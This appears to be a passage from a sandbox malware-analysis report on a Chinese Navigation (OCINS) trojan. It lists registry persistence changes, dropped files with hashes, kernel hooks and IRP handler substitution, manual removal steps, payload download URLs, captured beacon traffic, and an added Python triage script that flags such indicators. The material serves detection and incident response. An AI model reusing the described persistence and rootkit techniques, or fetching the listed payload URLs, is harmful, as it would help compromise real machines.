"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\0\win32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"
"Default Visible" = "Yes"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"
[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"
[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"
"Group" = "Boot System Extenders"
[HKLM\SOFTWARE\OCINS]
"InstallPath" = "%Program Files%\OCINS"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0]
"(Default)" = "IEAux 1.0 Type Library"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"
[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation2.6.0.0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"
[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IIEHlprObj"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F6 9D 75 AB 13 28 BB D4 5B 87 F2 8A 73 1A 6D"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\HELPDIR]
"(Default)" = "C:\PROGRA~1\OCINS\"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"(Default)" = "{7605CC7B-00FD-4A5F-BAFD-828342DE6279}"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"
[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
IE's Customize Search and Search Assistant pages are pointed at an external host:
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://client.jogo.cn/cdn/browser/customsearch/customsearch-en.html"
"SearchAssistant" = "http://client.jogo.cn/cdn/browser/sidesearch/sidesearch-en.html"
The following kernel driver is registered as boot-start ("Start" = 0, SERVICE_BOOT_START): the OS loader loads it before any user-mode code runs:
[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"
To run itself automatically each time Windows is booted, the Trojan adds the following autorun value pointing to its file:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"
"SystemRoot"
[HKCU\Console]
"KwUnSelf"
The Trojan removes the following autorun values, disabling whatever programs they launched at startup:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"uninsrest"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"renewup"
"ExFilter"
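The registry changes recorded above are the artifacts a responder would check for on other hosts: the Local Intranet zone widening and proxy removal (soft256.exe, cnnic_1009.exe and %original file name%.exe sections), the boot-start cnprov driver and auto-start idnaux driver, the IdnSvr value under the Run key, the IE search pages pointed at client.jogo.cn, and the toolbar button whose exec target is config.exe. The script below is an added example, not part of the Lavasoft report or of the sample; it parses both the report's own notation and the .reg notation written by `reg export`, and its sample text is constructed from the entries above. The category names and the microsoft.com allowlist for search pages are my own choices; the ZoneMap finding is reported but, as noted above, is weak evidence by itself.

```python
"""Triage of registry changes from a sandbox report or a `reg export` (.reg) file.
Added example, not part of the Lavasoft report or of the sample's own code.
Checks: Local Intranet zone widening, proxy removal, Run/RunOnce autoruns,
early-start kernel drivers, IE search-page overrides, IE toolbar buttons."""
import re
from urllib.parse import urlparse

HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU",
         "HKEY_CLASSES_ROOT": "HKCR", "HKEY_USERS": "HKU"}
KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^(?:"([^"]*)"|(@))\s*=\s*(.*)$')  # "Name" = data  or  @=data
IE_SETTINGS = r"hkcu\software\microsoft\windows\currentversion\internet settings"
ZONEMAP = IE_SETTINGS + r"\zonemap"
SERVICES = r"hklm\system\currentcontrolset\services" + "\\"
RUN_KEYS = (r"\microsoft\windows\currentversion\run", r"\microsoft\windows\currentversion\runonce")
IE_SEARCH = r"hklm\software\microsoft\internet explorer\search"
IE_EXT = r"hklm\software\microsoft\internet explorer\extensions" + "\\"

# Constructed from the entries above: first in the report's notation, then the
# idnaux driver as `reg export` would write it (.reg notation, dword values).
SAMPLE_REPORT = r"""[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
"UNCAsIntranet" = "1"
"IntranetName" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"
"Start" = "0"
"ImagePath" = "system32\drivers\cnprov.sys"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://client.jogo.cn/cdn/browser/customsearch/customsearch-en.html"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"
"""
SAMPLE_REG = r"""[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\idnaux]
"Type"=dword:00000001
"Start"=dword:00000002
"ImagePath"="system32\\drivers\\idnaux.sys"
"""


def _decode(data):
    """dword -> decimal string; quoted strings unescaped; hex:/binary data left raw."""
    data = data.strip()
    if data.lower().startswith("dword:"):
        return str(int(data[6:], 16))
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data


def parse_registry_text(text):
    """Return {key path: {value name: data}} with hives abbreviated to HKLM/HKCU/..."""
    snapshot, key = {}, None
    for line in (ln.strip() for ln in text.splitlines()):
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            for long, short in HIVES.items():
                if key.upper().startswith(long + "\\"):
                    key = short + key[len(long):]
            snapshot.setdefault(key, {})
            continue
        m = VAL_RE.match(line)
        if m and key is not None:
            snapshot[key]["(Default)" if m.group(2) else m.group(1)] = _decode(m.group(3))
    return snapshot


def triage(snapshot):
    """Return (category, detail) findings; key paths are compared case-insensitively."""
    lower = {k.lower(): (k, v) for k, v in snapshot.items()}
    findings = []
    zm = lower.get(ZONEMAP, ("", {}))[1]
    widened = [n for n in ("ProxyBypass", "UNCAsIntranet", "IntranetName") if zm.get(n) == "1"]
    if widened:  # matched hosts get the Local Intranet zone's weaker settings
        findings.append(("ie_zone_widened", ", ".join(widened)))
    ie = lower.get(IE_SETTINGS, ("", {}))[1]
    if ie.get("ProxyEnable") == "0":
        left = [n for n in ("ProxyServer", "AutoConfigURL") if n in ie]
        findings.append(("ie_proxy_disabled", "remaining: " + (", ".join(left) or "none")))
    for kl, (k, v) in lower.items():
        leaf = k.rsplit("\\", 1)[-1]
        if kl.endswith(RUN_KEYS):
            findings += [("autorun", f"{k}\\{name} -> {cmd}") for name, cmd in v.items()]
        elif (kl.startswith(SERVICES) and kl.count("\\") == SERVICES.count("\\")
              and v.get("Type") in ("1", "2") and v.get("Start") in ("0", "1", "2")):
            # Type 1/2 = kernel or file-system driver; Start 0/1 loads before any user-mode code
            cat = "auto_start_driver" if v["Start"] == "2" else "boot_start_driver"
            findings.append((cat, f"{leaf} Start={v['Start']} ImagePath={v.get('ImagePath')}"))
        elif kl == IE_SEARCH:
            for name, url in v.items():
                host = (urlparse(url).hostname or "").lower()
                if host != "microsoft.com" and not host.endswith(".microsoft.com"):
                    findings.append(("ie_search_override", f"{name} -> {url}"))
        elif kl.startswith(IE_EXT) and "exec" in v:
            findings.append(("ie_extension", f"{leaf} exec={v['exec']}"))
    return findings


if __name__ == "__main__":
    for category, detail in triage(parse_registry_text(SAMPLE_REPORT + SAMPLE_REG)):
        print(f"{category:20} {detail}")
```

On a suspect host, `reg export HKLM\SYSTEM\CurrentControlSet\Services services.reg` (and the same for the Run and Internet Settings keys) produces input the parser accepts directly. Compare the boot_start_driver and auto_start_driver findings against a known-good baseline of the same Windows build, since legitimate drivers appear in those categories too; the report's own cnprov (Start = 0, group "Boot System Extenders") and idnaux (Start = 2, depends on Tcpip) are what should stand out.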
The process setup.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 62 4C 73 7C 66 E1 4B 61 7E 2D 32 FB 5D 52 AA"
The process %original file name%.exe:1712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"soft256.exe" = "soft256"
"cnnic_1009.exe" = "cnnic_1009"
Proxy use is disabled (together with the deletions below, IE is left with no static proxy and no PAC script and connects directly):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process idnsvr.exe:4052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 04 AB 01 43 81 A1 56 B7 94 93 23 C0 0F C3 E8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
The Trojan deletes the following value(s) in system registry:
[HKCU\Console]
"KwUnSelf"
Dropped PE files
MD5 | File path |
---|---|
9f230f967a8607b7565cfcb83d963a96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cndsv.dll |
b06090ee2881c1bac0d275b17d140d3b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprov.sys |
3d8a11f1dc9127afc415a3c5aa0f4ab8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprovh.dll |
bc69dffa76af3297b653bfc814f7b87f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\config.exe |
57b46fc2b9cb59275cdcfb5e1722f48f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\convs.dll |
135ab6cf712cd9fc4b5cd55d71e781c0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnreg.dll |
70019002fdac4580e81d7ff75fb598db | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.dll |
2312b02cf8c50bc32cdb0686a9c3ac96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.exe |
59edc983e52851d195e7c61e8efad602 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\ieaux.dll |
c8d32d9ce600888693ccb1864bf6bdd2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\loader.exe |
088efc555a77d8d35a9ff367ca48d86f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.dll |
a4bf929fdcb401b8cfd9fd212686907e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.exe |
5af44e42174649b95758b0e5ef79adf6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\uninstall.exe |
6401dc5833d65f4d95bd6e8f78fdf8a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cnnic_1009.exe |
f2324a0a589478957b66b967c8d95d8c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\m4.exe |
3872b1238b8e6c1b92c20e63b6560009 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\soft256.exe |
f2324a0a589478957b66b967c8d95d8c | c:\MP3\svchost.exe |
0a96acb043f1c72e088a46358bb1b5a3 | c:\Program Files\OCINS\austr.dll |
9f230f967a8607b7565cfcb83d963a96 | c:\Program Files\OCINS\cndsv.dll |
3d8a11f1dc9127afc415a3c5aa0f4ab8 | c:\Program Files\OCINS\cnprovh.dll |
bc69dffa76af3297b653bfc814f7b87f | c:\Program Files\OCINS\config.exe |
57b46fc2b9cb59275cdcfb5e1722f48f | c:\Program Files\OCINS\convs.dll |
70019002fdac4580e81d7ff75fb598db | c:\Program Files\OCINS\idnsvr.dll |
2312b02cf8c50bc32cdb0686a9c3ac96 | c:\Program Files\OCINS\idnsvr.exe |
05cc443897f1b818b45ee0678c9e506f | c:\Program Files\OCINS\ieaux.dll |
764abdae9880ab1c3ea725a9bb62b784 | c:\Program Files\OCINS\uninstall.exe |
0a96acb043f1c72e088a46358bb1b5a3 | c:\Program Files\OCINS\update\austr.dll |
f6a405cded18319b910822cfceb03af7 | c:\Program Files\OCINS\update\update.exe |
041f9424d638ddc0ff8f21d44ded7c72 | c:\WINDOWS\system32\drivers\cnprov.sys |
d5bb1996768ed9f61915be739a1fcc43 | c:\WINDOWS\system32\setup.exe.tmp |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\cnprov.sys" the Trojan monitors the creation and termination of processes by installing a process notifier.
Using the driver "%System%\drivers\cnprov.sys" the Trojan monitors the creation and termination of threads by installing a thread notifier.
Using the driver "%System%\drivers\cnprov.sys" the Trojan monitors the loading of executable images into memory by installing a load-image notifier.
The Trojan installs the following kernel-mode hooks:
ZwClose
ZwCreateKey
ZwCreateThread
ZwDeleteKey
ZwDeleteValueKey
ZwEnumerateValueKey
ZwOpenKey
ZwQueryValueKey
ZwReplaceKey
ZwRestoreKey
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetValueKey
Using the driver "%System%\drivers\cnprov.sys" the Trojan substitutes IRP handlers in a file system driver (NTFS) to control operations with files:
MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION
Using the driver "%System%\drivers\idnaux.sys" the Trojan substitutes IRP handlers to control the devices of the tcpip.sys driver:
MJ_CLOSE
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL
Using the driver "%System%\drivers\cnprov.sys" the Trojan substitutes IRP handlers in a file system driver (FastFAT) to control operations with files:
MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
soft256.exe:2724
cnnic_1009.exe:2892
m4.exe:2840
update.exe:3408
setup.exe:2200
setup.exe:3476
setup.exe:3264
%original file name%.exe:1712
idnsvr.exe:4052
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\e1JePg78g.dll (33 bytes)
%System%\setup.exe (12214 bytes)
C:\MP3\svchost.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)
%Program Files%\OCINS\convf.dll (1281 bytes)
%Program Files%\OCINS\replace.dat (343 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\cuscfg.dat (145 bytes)
%Program Files%\OCINS\ctrcfg.ini (230 bytes)
%Program Files%\OCINS\cnrbtn.html (486 bytes)
%System%\drivers\idnaux.sys (10 bytes)
%Program Files%\OCINS\version.dat (482 bytes)
%Program Files%\OCINS\kwrep.dat (191 bytes)
%Program Files%\OCINS\idnaux.dat (39 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\srchsp.dll (32 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
%WinDir%\ocinfo.dat (8 bytes)
%System%\idnreg.dll (36 bytes)
%Program Files%\OCINS\addrmsg.dll (601 bytes)
%Program Files%\OCINS\addrmsg.ini (6 bytes)
%Program Files%\OCINS\cnprovh.dll (601 bytes)
%Program Files%\OCINS\convs.dll (601 bytes)
%Program Files%\OCINS\cndsv.dll (601 bytes)
%Program Files%\OCINS\config.exe (601 bytes)
%Program Files%\OCINS\idnsvr.exe (601 bytes)
%Program Files%\OCINS\idnsvr.dll (601 bytes)
%Program Files%\OCINS\usrcfg.ini (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\OCINS\update\version.dat (482 bytes)
%Program Files%\OCINS\austr.dll (65 bytes)
%Program Files%\OCINS\update\data2.cab (9696 bytes)
%Program Files%\OCINS\update\update.exe (273697 bytes)
%Program Files%\OCINS\update\austr.dll (1568 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 114688 | 35840 | 5.5358 | 5b547387783d91b4b3e6beaaea639923 |
.rsrc | 118784 | 12288 | 9728 | 4.02815 | 11196967b6fe974fa5d94b67be64252e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://update.jogo.cn/cdnClient/update/v26_p/version.dat | |
hxxp://update.jogo.cn/cdnClient/update/v26_p/data2.cab | |
hxxp://50.117.116.117/down/wxpSetup256.txt | |
hxxp://jump.knet.cn/stat/stat | |
hxxp://jump.knet.cn/stat/first | |
hxxp://50.117.120.254/down/wxpSetup256.txt | |
hxxp://update.jogo.cn/cdnClient/update/v26_p/update.exe | |
hxxp://www5.softuu.cn/down/wxpSetup256.txt | 50.117.116.117 |
update.cnnic.cn | 202.173.11.10 |
jump.cnnic.cn | 202.173.11.132 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /stat/first HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 53
sid=1001&pid=0000&sw=C_gr294&sp=002.006.000.000&drv=1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Wed, 16 Apr 2014 08:33:48 GMT
POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
